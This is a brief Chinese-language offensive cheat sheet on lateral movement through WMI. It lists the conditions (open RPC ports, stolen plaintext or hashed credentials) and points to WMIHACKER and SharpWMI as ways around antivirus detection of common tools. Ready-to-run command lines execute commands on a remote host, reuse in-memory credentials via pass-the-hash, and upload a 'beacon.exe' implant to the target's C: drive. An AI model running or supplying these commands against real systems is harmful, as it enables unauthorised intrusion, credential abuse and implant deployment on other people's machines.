一、利用条件:
1、目标开启135、49154端口
2、拥有目标的凭证(明文账号密码、账号hash、内存有正确的凭证)
二、优缺点:
优点:不需要对方开启445端口
缺点:需要对方开启rpc,有些机器是不会开的
三、利用流程:
他们都是通过wmi执行命令,然后把结果存放在注册表,再去读取注册表的
四、WMIHACKER:
常见的WMIEXEC、PSEXEC方式基本都被杀软拦截,可以试试WMIHACKER这个360弄出来的工具
1、参数:
2、常用参数:
①cscript //nologo WMIHACKER_06.vbs /cmd 192.168.1.4 <user> <password> whoami 1
#末尾的1就是要让⼯具回显执⾏命令的结果的意思,如果是0就是不回显
②说⼀下这个⼯具如何在pth或者make_token下⼯作
cscript //nologo WMIHACKER_06.vbs /cmd 192.168.1.4 - - whoami 1
只要账号密码位为-,那么就会直接使⽤内存的凭证去连接wmi并执⾏后⾯的操作
五、SHARPWMI:
SHARPWMI出自QAX-Team:https://github.com/QAX-A-Team/sharpwmi ,比较好用。这个要自己编译才是最新版本,release里面哪个exe不是最新版。
1 、SHARPWMI常用参数:
sharpwmi.exe 192.168.1.4 administrator 123 cmd whoami
sharpwmi.exe 192.168.1.4 administrator 123 upload beacon.exe c:\beacon.exe
sharpwmi.exe pth 192.168.1.4 cmd whoami
sharpwmi.exe pth192.168.1.4 upload beacon.exe c:\beacon.exe
上传是通过poweshell的